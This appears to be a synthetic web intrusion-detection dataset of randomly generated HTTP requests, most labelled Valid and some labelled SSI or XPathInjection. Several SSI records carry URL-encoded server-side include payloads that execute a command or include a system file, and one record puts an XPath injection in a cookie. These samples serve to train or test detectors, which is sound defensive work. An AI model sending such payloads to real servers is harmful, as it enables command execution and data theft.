From: trfa6z2@ddndo4aOn.be
If-Modified-Since: Sat, 16 Aug 08 14:37:11 UTC
If-Unmodified-Since: Tue, 17 Nov 09 15:08:28 CET
If-Match: "mfNK7fiFjHYx8@hU"
If-None-Match: "ORxJ_dPMZENAuyO"
If-Range: *
Max-Forwards: 5
MIME-Version: 9.9
Pragma: gvse='tz'
Proxy-Authorization: Digest algorithm=Eaeos
Authorization: NTLM dWpldWk5ZWd0aWVtanJudHRFZG5xYWFhbmluNXJja3NpcXdsRWluV0J5TnBubnY=
Range: 581-,06-0,27-
Referer: http://www.atisa.com/rasoea3.pdf
TE: chunked,trailers
Trailer: Expect
User-Agent: Mozilla/1.1 (Windows; U; Win 9x 9.4; i1-eo; rv:2.0.7) Gecko/22156610
UA-CPU: MIPS
UA-Disp: 280,3333,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 154x250
Via: 1.8 77.157.45.19:2, 7.5 6.69.215.137, HTTP/7.7 www.kvsl.js
Transfer-Encoding: identity
Upgrade: znl/9.4, enhOao/1.7, esna/5.0
Warning: 167 24.248.253.219 "whbgrnjdetnenb" "Sat, 13 May 06 20:49:02 GMT"
X-Forwarded-For: 66.190.156.36
X-Serial-Number: 69375200108238652611
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31890
Start - Id: 5707
class: Valid
POST /HzVOCo/srnlnr/sa/t9Ix/mFuybFvmSxGrYRB/ket/dW-7Q/ji8itrV--5t3qKm7a-/icP/o@xOw2l.msf? HTTP/1.1
Content-Length: 95
Content-Language: ned,ttt
Content-Encoding: identity
Content-Location: /wa0yuj/9onp8d4.jsp
Content-MD5: eXJnbTdsRTl0anRnZnV6TA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 27 Jan 05 21:00:47 UTC
Last-Modified: Tue, 16 Jan 07 17:27:18 GMT
Host: www.ossDue7Cwo.org
Connection: nlea
Accept: audio/x-wav;q=0.4, audio/*;q=0.3, image/*;q=0.0
Accept-Charset: big5, isiri-3342, ks_c_5601-1987, x-mac-japanese;q=0.8
Accept-Encoding: deflate
Accept-Language: *
Cache-Control: max-age=1
Client-ip: 110.24.246.81
Cookie: teNthagyl61y=14892;iiesmod=oeeietse;nabas=dItesb8aegh
Cookie2: $Version="819"
Date: Mon, 20 Nov 06 20:12:11 GMT
ETag: "VVGNW8zSXxQI4.C1N"
Expect: 100-continue
From: ototLn2u@5heey.uk
If-Modified-Since: Fri, 24 Apr 09 04:11:51 CET
If-Unmodified-Since: Thu, 26 Feb 09 05:05:52 CET
If-Match: *
If-None-Match: "Qoq1w6_UNGcl20zu"
If-Range: "OXMZ@iYE2nT47yi5"
Max-Forwards: 9
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Digest response="EF4ECf02FCB0B3A3dBCfC57Ba47ABc57"
Authorization: Basic ZWV1bW1jOmx1eXNoc3Jh
Range: 40090-
Referer: /eordnOm3/hnfh.swf
TE: deflate,trailers
Trailer: Cache-Control
User-Agent: msdtir (iKwdz7c7@; eAw@cMbNeD; moK@AKSG)
UA-CPU: 68000
UA-Disp: 1912,4963,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 327x1132
Via: 4.6 46.205.33.112, FTP/2.5 www.uuriec.gif
Transfer-Encoding: deflate
Upgrade: nxew/9.7, neam/4.9, tRYe/6.4, 8mide/6.4, aola/1.1
Warning: 479 www.cld3el.css:64 "ogBceDtbEhhj6uwZ" 
X-Forwarded-For: 15.65.145.193
X-Serial-Number: 7835393170
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

7mmty5epymqsw=gDTDAyoX&htihlojtpthvb=3vsTX&TmfyElsoi=34328498&si4tbrTcdRee=sdStYf5 /hrhawgetl

End - Id: 5707
Start - Id: 11176
class: Valid
GET /cP8/dcr/JBNhDU/eigil/eS4zY5ywCvMRs.tungf/ea9reeaEsi/EechoI%u/iicein0eaaoat/onJitiagDaiodwtw/elogm3aPdqyP4UGU/e4LOx2L5rIGiXf/XWSEl-meta.gif? HTTP/1.0
Host: 91.199.99.102:80
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: us-ascii;q=0.7, x-mac-icelandic;q=0.0, iso-2022-jp
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 72.157.48.145
Cookie: oym2otUy09tomu=2569;OrsDy9iae=tLVO2KRd;ep1w9dRleeeayr=i]erscriptidiee =ud;9sTr877Oni=ip1win4hcwberyut;eeeen5ihns=8152
Cookie2: $Version="235"
Date: Sat, 15 Sep 07 02:24:48 CET
ETag: W/"FNh84PSplg7zFNa"
Expect: 100-continue
From: exRkrsa@Adzgatioo.net
If-Modified-Since: Sat, 21 Apr 07 24:45:14 UTC
If-Unmodified-Since: Sat, 08 Apr 06 09:27:28 CET
If-Match: "VFT-G0bCgJEADUb5Rq8"
If-None-Match: "TTdH7sdzwCe5eXH6M0U"
If-Range: Mon, 16 May 05 10:25:12 CET
Max-Forwards: 75
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: nucsre csotd=enlnnuol
Authorization: psJcu ei5Dhfa=Oenrgwc
Range: 01809-,9808-,-723
Referer: http://www.ih6lo6.cz/athsrr/qwnvc/9sddiV/rnghs.asp
TE: trailers,trailers
Trailer: Warning
User-Agent: aq5gzf/5.2.8
UA-CPU: StrongARM
UA-Disp: 473,1490,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0885x0139
Via: 6.3 248.152.95.206, 0.6 189.82.35.112
Transfer-Encoding: gzip
Upgrade: aSraw/8.9, oumeo/3.1, 3alN/4.2, Kirn/2.1, txon/6.0
Warning: 587 29.152.16.59 "sKvi" "Sat, 16 Jul 05 05:54:58 CET"
X-Forwarded-For: 199.166.24.178
X-Serial-Number: 400472964333803
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11176
Start - Id: 6637
class: Valid
PUT /ag/wiao.mdb? HTTP/1.1
Content-Length: 136
Content-Language: deoqgs,eehEtrn
Content-Encoding: deflate
Content-Location: http://www.3hbnryS6.ch/ahR3h/shtdelry/bnievh6w/esgiw.gif
Content-MD5: cmllZWVZYUNsc08xdGJtTA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 24 Jan 06 10:55:05 CET
Last-Modified: Sat, 26 Jul 08 20:09:12 CET
Host: www.lpm6dlhd.org:80
Connection: close
Accept: application/*;q=0.6, image/png;q=0.7
Accept-Charset: euc-tw
Accept-Encoding: deflate, identity, compress;q=0.5
Accept-Language: ltdw-tT, t-tg2si, pd-dtge, t1-etode, oe-uayj
Cache-Control: no-store
Client-ip: 46.201.126.153
Cookie: hoe=67215183;rtlnrt=nY7;deiaaad=1969793;7recndsu=6ed'
Cookie2: $Version="345"
Date: Tue, 06 Jan 09 16:20:55 GMT
ETag: W/"v7N@UYgIYxK63@18EeG"
Expect: 100-continue
From: opcra@uqeH.it
If-Modified-Since: Tue, 26 Oct 04 12:56:32 CET
If-Unmodified-Since: Fri, 10 Nov 06 03:46:21 CET
If-Match: *
If-None-Match: "2k-4U7oX-xz@9a6zRs-"
If-Range: *
Max-Forwards: 09
MIME-Version: 0.0
Pragma: gya=woA
Proxy-Authorization: NTLM cnp1Z3NpYXNmYlVvZWhvZWN0am5zYnZyckR0ZVpod2x0dHM=
Authorization: nie9v mbstnt=uhIrntbi
Range: -08,-241,7-856
Referer: http://www.se1us.uk/setOei.php4
TE: chunked
Trailer: Pragma
User-Agent: Mozilla/1.8 (X11; U; Open BSD i586 8.4; 2e-es; rv:4.4.4) Gecko/52906531
UA-CPU: MIPS
UA-Disp: 7646,961,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 792x1593
Via: 1.5 www.gstlcC2.css:00201, 0.8 www.PaelH.png, 9.8 245.188.234.56
Transfer-Encoding: deflate
Upgrade: zfoa/4.4, me8e/8.0, eH5/5.3
Warning: 107 www.Hiehri.js "eswanigari" 
X-Forwarded-For: 239.4.241.123
X-Serial-Number: 1883916310
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

J0hgqwk=3on&M9aweLsye=1tuh2eBarhponsgpr&eMmSIetnreeh8=irtgH0xooa0amegt&temdydsa8n=rs&ebldWSih=el&teai1jadTnci=lneh|r2m&nbqocsdm=808178

End - Id: 6637
Start - Id: 24202
class: Valid
GET /aotSRlenDgempi64t/at.asmx?qypqed4stoeRiwm=gtroeadkz&tsyoH=29002&M3https_k2rY=o7insert&eattodx0as7uexw=cahfo&group bykQ7xS=2tseemslyVunRnN&RrlcsawAyrun=97386&ZiZW6f=mcBu2u16vH&s0eaCr0mffitzt=%3D%247hn%3B&gi8eo=0246518923&3vKZQh=divxsg%26%3C%259wmRe+ophp&eeeaRuomdu=0&irMistlhayjisp=1461790&c5oeiyenrxh=nho&adb=onPAHc6TzLn HTTP/1.0
Host: 174.249.151.81:2251
Connection: m4enE
Accept: text/plain, image/*;q=0.0
Accept-Charset: windows-1250, koi8;q=0.1, iso-8859-8-i;q=0.9, windows-1251, windows-874;q=0.7
Accept-Encoding: identity, deflate
Accept-Language: *
Cache-Control: eSvd=mihx
Client-ip: 170.39.21.142
Cookie: batqhierAsg4vey=OEgsgo3oaoclgdn
Cookie2: $Version="564"
Date: Sun, 19 Feb 06 05:50:42 UTC
ETag: W/"d4RMo3ppA5gVFGw"
Expect: 100-continue
From: vktxen@eejuti.biz
If-Modified-Since: Fri, 14 Jul 06 01:01:36 UTC
If-Unmodified-Since: Thu, 12 Feb 04 10:02:27 CET
If-Match: "JtO_jpn-k2kO7.y5e"
If-None-Match: *
If-Range: "YwaLzbXpwO0-D9JahH"
Max-Forwards: 98
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: Iccdm brwetH=oa0t
Authorization: Digest nc=E7F8cB3A
Range: 497-0048,6-
Referer: http://9jtn.ch/bkoqa/oytbeClw/tmscshe/ssnimn.wav
TE: trailers
Trailer: Warning
User-Agent: odij (i1ajN7O; a1CIHou7; cGaE.Ol; tSsKAA)
UA-CPU: 68000
UA-Disp: 7755,8327,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 146x610
Via: FTP/0.0 101.162.88.118, FTP/0.2 142.39.65.104:012
Transfer-Encoding: identity
Upgrade: ees/5.3, ellt4t/5.4, hudaht/4.5, eEt/9.9, faaa/7.5
Warning: 155 147.225.115.94 "lnnt" 
X-Forwarded-For: 254.110.118.39
X-Serial-Number: 42275938447231485
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24202
Start - Id: 39444
class: SSI
GET /veehbsant8us8/rOboIaNem/1Zjp4p2lolFBi8mXj.gif?imdiewenl5sNof=8989&Gdb=cydigerpIdaey&Rrrh7qs=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&urd1o4oDrl=l+ioo&_RYef5=efuezaf&4o0HJ8z=e&ngaeyuhrtrr=tu+o&GByEL1sV=459472&sedm=eontlcij%3D7mLs%3Ft HTTP/1.0
Host: 189.218.38.101
Connection: keep-alive
Accept: audio/*;q=0.9, text/*
Accept-Charset: isiri-3342
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 179.178.240.191
Cookie: nfsrh=o(;1CAXZQDP0F=aelib
Cookie2: $Version="52"
Date: Sat, 22 Mar 08 05:14:45 UTC
ETag: W/"JPFcUX7xR6dGHrCDQjp"
Expect: 100-continue
From: sEoagpeb@dl8co4.de
If-Modified-Since: Mon, 03 Sep 07 21:39:48 CET
If-Unmodified-Since: Tue, 02 Oct 07 22:55:07 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 11 Apr 09 11:39:49 GMT
Max-Forwards: 151
MIME-Version: 7.4
Pragma: txbdoh='k5t'
Proxy-Authorization: rashN riiam=cssstki
Authorization: Basic dW9FcjphdnM3
Range: 336037-3,-38380
Referer: /nsaRanE.wmn
TE: chunked,gzip;q=0.5
Trailer: Warning
User-Agent: Mozilla/1.6 (Windows; U; Windows NT 3.7; ue-as; rv:5.1.3) Gecko/86938856
UA-CPU: Sparc
UA-Disp: 677,8714,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 015x2523
Via: HTTP/9.3 www.Trpso.js, FTP/0.5 63.142.43.126, 5.1 www.2larirh.png:738
Transfer-Encoding: identity
Upgrade: nSr/8.2, bkiiH/4.4, thru4/6.0
Warning: 799 37.15.16.235:0423 "eauhqipdaedde" "Thu, 30 Aug 07 24:57:07 CET"
X-Forwarded-For: 38.112.178.33
X-Serial-Number: 298841177786
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39444
Start - Id: 23736
class: Valid
GET /n.YP1QAlNDh/ENSperlprocessing-instructionQwsystemIF/IH91BD@T0-tmp_r/tttiMTpe535bhrm/wRwkh4z5zTcKV/tt.js? HTTP/1.0
Host: www.yyoet.biz
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.8
Accept-Language: amut-tue;q=0.0, na-aIgcn86Y;q=0.1
Cache-Control: no-transform
Client-ip: 167.147.62.199
Cookie: 2FjE.3=aJ2CN7-MyB@B;hneRitohleS=i~updatetc;iad1etlr=lte y;s3cCtdeel79s=snullwoBUa;h1=oe0nph-]aarsO9o;tagodaneaiSSHwl=0
Cookie2: $Version="629"
Date: Thu, 12 Oct 06 11:56:13 GMT
ETag: W/"XNE2Ei4pOYWMUMOWeFS"
Expect: 100-continue
From: SDcfto@h1dceuR3.cz
If-Modified-Since: Wed, 31 May 06 19:38:50 UTC
If-Unmodified-Since: Sat, 19 May 07 08:55:39 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 28 Feb 09 09:23:36 GMT
Max-Forwards: 4
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: NTLM YTJ2Y2Vtc29wdGF1bWZlaWRtaGUxZmVvc2RvdHdnYUFpcg==
Authorization: Basic bmF0M0xkOkl3ZWFh
Range: -020,8-,8-1
Referer: http://ubP37h.gov/ieesr/otpges.php4
TE: trailers
Trailer: From
User-Agent: rhHsOxil1fsrsod
UA-CPU: StrongARM
UA-Disp: 026,890,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 431x276
Via: Ttb/4.9 www.banets.gif:8002, HTTP/9.3 www.shysbOn.js
Transfer-Encoding: deflate
Upgrade: Oias/7.2, yee/0.3
Warning: 843 www.wgspyi.tiff:2 "uardrdnasUfstccn" "Sat, 28 Aug 04 22:14:21 GMT"
X-Forwarded-For: 96.18.53.61
X-Serial-Number: 13224
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23736
Start - Id: 23512
class: Valid
GET /iF/klwksllxeslrsodt/83@uA67L6AF/e_Tw/OnauAgo92milspcd/hhXIlR/cJ/aJAhQk_/U9XisBnull_yI7ld/7bxshutdownD4CE/nkPOP9HMhsf8Zta1wGs.bin?stdinLqUU=select&nctahm=5&natssoi2p=6+zmHm+%29-d%7E&eieronsfddq7=fh0ZteoB6zitdo0eo&dlieesstu=79336 HTTP/1.0
Host: 156.174.224.59
Connection: close
Accept: text/plain;q=0.7, text/*, image/*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: wkoin-5anaep, hbIe-obpgnwf;q=0.8, 6-awnmu
Cache-Control: max-age=66775
Client-ip: 223.207.76.118
Cookie: rs1yZu8fdETobject=e;lhr=sb0rorh8;dvpDJVHyAmG=i-noarU;irghs9=hi6ni7(;tlal=8005
Cookie2: $Version="0"
Date: Wed, 03 Mar 04 03:29:18 UTC
ETag: "WxO.5LN1c1XuAsPlzuvP"
Expect: s4Ffghrl
From: ltnesme@hsentase.it
If-Modified-Since: Thu, 22 Jan 04 18:45:40 CET
If-Unmodified-Since: Mon, 23 May 05 24:07:58 UTC
If-Match: *
If-None-Match: "f91eWlmGkrcd6os1uHQY"
If-Range: "90EI5iTxwUh_Lpu-GQvd"
Max-Forwards: 410
MIME-Version: 2.4
Pragma: tstSleAa=lwseit
Proxy-Authorization: Basic VHJzRDZtZTpzN2xldGl3cg==
Authorization: NTLM d2ljU2UybHNpZWFzaXNlVDJIcmVtaWV1eGh0b3BldDNtY24waW12a25h
Range: 90-,49-617
Referer: http://ateh.cz/rltro/T1Es/eyhii.nsf
TE: gzip;q=0.2
Trailer: Trailer
User-Agent: Mozilla/9.0 (Machintosh; U; Mac OS X 8.3; sj-ei; rv:1.2.1) Gecko/88994737
UA-CPU: x86
UA-Disp: 987,566,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 4426x0282
Via: HTTP/9.5 167.65.8.208:72
Transfer-Encoding: dpuai
Upgrade: Odqe/8.0, Phrs/0.8, i83hqn/9.8, 6d1a/9.7, joi/4.4
Warning: 316 www.deemx.htm:8305 "btsydnansow" 
X-Forwarded-For: 238.108.237.191
X-Serial-Number: 467341
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23512
Start - Id: 40570
class: SSI
GET /HexecJW_0plDhN7m/Jnae.js?nofmexst=95109&toda2=likemfm&chttFirtane9o3=sVZFmv_a&oLrNKofW=88266325&inx3etgelytn=ion&eYurrIueps=lU4%5Cg%29u7e&YHeU.JGX=%3C%21--%23include+++++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22+++++--%3E&jvbscriptOTQQC-75=n3mlnxen19ijnnrRzv&Cs5nullDebg3z=e_bUjyLI_&hh0t47stnrdGo=r&xIQSHinputVGmw@0=339&ptStG=arArwi8nciest&4t=4858&ri=89083927 HTTP/1.1
Host: 185.155.94.212
Connection: close
Accept: */*
Accept-Charset: iso-8859-7;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: max-stale=4209
Client-ip: 65.35.166.11
Cookie: oiundtTscmnet= v9no
Cookie2: $Version="19"
Date: Wed, 30 Mar 05 22:28:09 CET
ETag: W/"D-spAWNDhE4WTsd"
Expect: nnoh3ur=unoiiuae
From: ciHn@mdreeh.gov
If-Modified-Since: Sun, 10 Dec 06 17:24:05 UTC
If-Unmodified-Since: Sat, 08 Apr 06 01:55:41 CET
If-Match: "dEMvzW.D2QQLuE3ly"
If-None-Match: "m3XJCyfgckt14Mfk"
If-Range: Mon, 11 Oct 04 19:02:18 GMT
Max-Forwards: 917
Pragma: rm=e8ort
Proxy-Authorization: esno rs47tyd=n7dsbg
Authorization: NTLM bmFlZUhzMk9PNmowdXJ0dDNlZ2llOHJzaWt1ZU1CZWlj
Range: -296381
Referer: http://g1e1a.com/ttdhNk/rremorsc/e1ue/darren/eshl.gif
TE: gzip;q=0.1
Trailer: Host
User-Agent: Mozilla/1.5 (compatible; MSIE 3.4; Linux i386; sera; iemcr)
UA-CPU: PowerPC
UA-Disp: 5809,4725,8
UA-OS: Win9x
UA-Pixels: 0455x286
Via: HTTP/3.8 225.169.108.156, 6.5 71.99.153.32, HTTP/8.0 48.188.73.98
Transfer-Encoding: deflate
Upgrade: nmoNa/7.1, shl/2.8, suah/2.9, drnip/9.7, aunle/8.8
Warning: 519 www.eejaeye.png "rslbjmqpxcnge" 
X-Forwarded-For: 93.136.204.39
X-Serial-Number: 56779
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40570
Start - Id: 12678
class: Valid
GET /rK.JAI@34ilQSudWDa/nz@ItxQqgonobZbv_c/fkatileejd4cnsinole/ie2wE6n1rh/ahtp7iisenntnk/Cs/hnhsalse/m4QGpJNW/dZ/ehrdhnnlV7.png?qtetp=5&mneiitt=597&woniatbdafoE=Iea&ptbu0tfhq=fI4i&aennEthEc=932043&U@a6D=gmailTDhEoo&ioibeO=hh&as8nh=233&5fZy=psrch&hgdirgtd=sibrH&nsftnnBirsh=ea&oeetsshtCnmTzs=fnaii38&tPmleedc=f%2BEfnosinrln HTTP/1.0
Host: www.nOOo6tiy.it
Connection: close
Accept: image/*, audio/*
Accept-Charset: koi8;q=0.2
Accept-Encoding: 
Accept-Language: eliBwgl6-eg;q=0.5, deon3hd-AR, 4enzhy-udnSihN9
Cache-Control: no-store
Client-ip: 59.17.147.146
Cookie: olff=WnAitdntidid;ny0traA=mcdnmi4Oew;ovty6aNp=4983772154;oe=17
Cookie2: $Version="70"
Date: Sat, 07 Aug 04 02:13:11 GMT
ETag: "Z6bDR6ol6FudYgKgsa"
Expect: 100-continue
From: heour@oeunirs.uk
If-Modified-Since: Thu, 11 Oct 07 03:30:13 GMT
If-Unmodified-Since: Fri, 12 Mar 10 10:09:45 GMT
If-Match: "ZG1kXH-5HZsz7owtU"
If-None-Match: "CmXR38jwHEtLyFU_U."
If-Range: *
Max-Forwards: 5
MIME-Version: 3.8
Pragma: less=1
Proxy-Authorization: Basic bzJtc3RTdDpyc3JnaXB0Tw==
Authorization: hkPedt einsnc=lIImlmc
Range: 123920-
Referer: http://www.acgrSms.cz/s6es/oqor/t7du.jpeg
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/2.1 (X11; U; SunOS sun4u 8.9; nd-i5; rv:0.1.1) Gecko/64463175
UA-CPU: Sparc
UA-Disp: 8687,0336,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 118x1271
Via: 5.0 www.Idtezuir.tiff:9797
Transfer-Encoding: identity
Upgrade: sto2/5.6, i35ueo/6.1, obrejt/0.3, it5/7.0, igelon/5.7
Warning: 604 0.169.62.121 "ntoiigc3nubtmi3tnc" 
X-Forwarded-For: 158.192.234.112
X-Serial-Number: 444066878
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 12678
Start - Id: 13479
class: Valid
GET /08I6arBqkRHO9/weNoD2i/er.php3?h2spsErrirzii0=otEnnulaMstShV&shts8spna=953 HTTP/1.0
Host: 11.125.230.206
Connection: xbe6eomk
Accept: */*;q=0.4
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.4
Accept-Language: rnd-uauhs
Cache-Control: no-transform
Client-ip: 168.3.160.150
Cookie: otw=506915249;yu=ten9&tol hjke
Cookie2: $Version="69"
Date: Tue, 07 Aug 07 10:32:30 GMT
ETag: W/"GmUUIhFbJ@1bmc5s"
Expect: 100-continue
From: iaeuease@fasecroo.st
If-Modified-Since: Wed, 03 Oct 07 22:45:56 GMT
If-Unmodified-Since: Sun, 20 Feb 05 08:36:10 CET
If-Match: *
If-None-Match: "KL4B1_4k9tWDGyW_lttt"
If-Range: *
Max-Forwards: 1488
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Basic Mm9qdDpUc2Vkam5l
Authorization: Digest opaque="bln1e8gm"
Range: 00941-
Referer: /fmtm/wetm3ha/ehSbo/fiebhgse/dTr3.swf
TE: gzip,deflate
Trailer: TE
User-Agent: Cupybo (gkjnyGB; rr7BAA; l9lfmd3)
UA-CPU: x86
UA-Disp: 710,2643,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 801x0437
Via: FTP/7.9 238.182.2.37, HTTP/6.3 232.17.196.131
Transfer-Encoding: gzip
Upgrade: odo/1.8
Warning: 395 142.107.115.72:81 "auagelgcsknaoh" 
X-Forwarded-For: 37.38.29.200
X-Serial-Number: 648318819511788387
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13479
Start - Id: 40300
class: SSI
GET /te/7HLBZMJxcx/tVlSr/nku6gwo/urofu3tpoRrdTslae/gaPQb2T8.php3?deleter6POnX=231666&Ifealxehenb=boil4&f7Ediaa=%3C%21--+++%23exec+++cmd%3D%22c%3A%5Cprogra%7E1%5Clelorrdjsy%5Ce4%5Clbme.exe+++++d%3A%5CmaeeQ%5Cwww.maenilta.org%5Ccni%5Cdatabase.mdb+++++%2Fx++++exporttofoxpro%22--%3E&vdqnro6Ey0mtrc=394930&yPsusEnewtr=ckK&iwjpAtf=g1Teepon&tedsw=saU&s2cUnEsaugeeT6i=9935030&ne51m7tneau8e=63421&gwn=dC.M4Kb&rewjf=ltodnahh&9rd1u=6tSrnItawdf&A6EkrmconnectnEmFWpasswd=qMzh1ORoXt HTTP/1.0
Host: www.iic9co.com
Connection: close
Accept: image/jpeg;q=0.1, text/*;q=0.3
Accept-Charset: x-mac-arabic;q=0.6, iso-8859-6;q=0.8, cp-936;q=0.0, windows-874;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: Bthtyne=d9mau
Client-ip: 225.234.167.170
Cookie: leeisrU4a=bMw8-5r1u2_;adfdhv6M=~ser@;psst=dyJ2wiIA;hcdheAHneqtNzi5=teglo3f4i;thp9th=nebin4boot.inifZAkm'j;rnsbva=hhl2sgrzexeoki
Cookie2: $Version="373"
Date: Sun, 03 Feb 08 11:44:15 GMT
ETag: W/"cZahXkYy1L59OAb"
Expect: 100-continue
From: oyte@woinhmes.com
If-Modified-Since: Wed, 05 Mar 08 19:01:14 GMT
If-Unmodified-Since: Sun, 12 Nov 06 11:38:36 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 22 Dec 05 07:20:42 CET
Max-Forwards: 5438
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: oeos goaweqW=tqMehbrx
Authorization: Digest response="3f31C46cFe8c67aF5E5a5aF39FC6de6F"
Range: 5046-3165,-1034
Referer: /rctRe/euhrsz/a3DA5z.msf
TE: deflate;q=0.5,chunked;q=0.9,trailers
Trailer: If-None-Match
User-Agent: ikPdtasi/3.4.3
UA-CPU: MIPS
UA-Disp: 996,846,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 2184x777
Via: 0.3 78.171.60.206
Transfer-Encoding: ramO
Upgrade: hiCkrp/2.9, tclcr/7.7, ntp5/3.3, her/1.8
Warning: 285 39.249.111.46 "orhrou3Uo8amdcneinui" "Sun, 02 Sep 07 09:37:14 CET"
X-Forwarded-For: 154.142.43.224
X-Serial-Number: 475557970524
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40300
Start - Id: 14195
class: Valid
GET /cedtiiai/am2HekEd/tu/eYOExNz-sPoVRe1.BEvR/ahrtaufTwe.nsf?2aeTsl=tMirbmneermote&d6=iphp++scripteypr%3Danfromlq&eauso6=e%2Btelnetform%40ine&8gemias6Jiaor=Zr%40&up7pauEtpEpkser=2ncIrataEles&ostez8aewyttw=et%29&t4xypnms4e=5Ji%40MTen9ih0&cf=d%2B+%3Fwscript5evalesos&in323lCnlzAt=a4TD%27&sfesaSokyjafep=rgNgI2TXqJXb HTTP/1.1
Host: 158.190.137.19
Connection: 9otsn
Accept: application/postscript;q=0.3, text/*, image/png;q=0.2
Accept-Charset: x-mac-korean, iso-10646-ucs-2
Accept-Encoding: gzip;q=0.1, gzip;q=0.4, compress;q=0.5, gzip;q=0.5, compress;q=0.3
Accept-Language: *;q=0.2
Cache-Control: max-stale=7
Client-ip: 173.105.91.45
Cookie: yeous38m=ctxmlopn:8processing-instructiones;bfformlikeFxF5=euye ;hfoegggu0=81141;obglza=AEym@nrlhso-;ymd1e=grPC
Cookie2: $Version="649"
Date: Tue, 19 Dec 06 03:15:19 CET
ETag: W/"W9tYLU-NVknOk.QSWN@"
Expect: 100-continue
From: wsyn@xHfoxPi.it
If-Modified-Since: Tue, 23 Dec 08 20:19:19 CET
If-Unmodified-Since: Thu, 11 May 06 18:28:06 GMT
If-Match: *
If-None-Match: "bU7BuD6bF4PEfXZLF"
If-Range: *
Max-Forwards: 41
MIME-Version: 5.4
Pragma: cs3dyob6=tydtrzr
Proxy-Authorization: NTLM ZWFzSHJlbnJybGl3cGNvd2VOa3RnaWpvb25ha2Zta2Vtc29xSWF1ZW1udGlh
Authorization: Digest nc=8F0f1A2E
Range: -96950
Referer: /bg0ys.dll
TE: chunked,trailers
Trailer: Transfer-Encoding
User-Agent: dx2miejrwzhech3
UA-CPU: x86
UA-Disp: 168,1348,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 3581x504
Via: HTTP/6.8 148.81.3.22
Transfer-Encoding: identity
Upgrade: lahia/9.9, khro/5.9, cn6rl/8.9, Leuecl/0.7
Warning: 607 145.140.108.102 "1uaqkehhratt5eDyite" 
X-Forwarded-For: 164.180.235.100
X-Serial-Number: 983815591636299863
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14195
Start - Id: 50051
class: XPathInjection
PUT /fdiifslcbgtmtmld/nDQDJOL/hdcNSYWFkJ/gRkpujjairCoilte/omelhsdninhma/nceyKnhiurtmolAtsltS.bin? HTTP/1.0
Content-Length: 205
Content-Language: nr
Content-Encoding: identity
Content-Location: http://eaDw.org/hhEtn/ra8etitc/mjkl.fgf
Content-MD5: RXRNdXVpZ2F3RWhhbDNlZw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 16 Jun 05 21:32:06 CET
Last-Modified: Fri, 25 Mar 05 22:58:59 CET
Host: 189.184.221.113:184
Connection: hs6t5h
Accept: */*
Accept-Charset: cp-932;q=0.0, iso-8859-8, windows-1255;q=0.2
Accept-Encoding: *
Accept-Language: yinoqyut-m;q=0.0, ss-iwYndiox, f-1ee;q=0.7
Cache-Control: no-transform
Client-ip: 84.186.147.101
Cookie: tter=01     or  eye/lToci/Mt2/child::node()[position()=48] or  877=;z9hahodrjkof=4;ssnsmdcrm6a6=sRndi
Cookie2: $Version="582"
Date: Sun, 16 Sep 07 17:14:52 UTC
ETag: "Bq72.9HX2ZKmz3bt"
Expect: arhdseea=sx3so
From: rffjOIp@Tenah9e.be
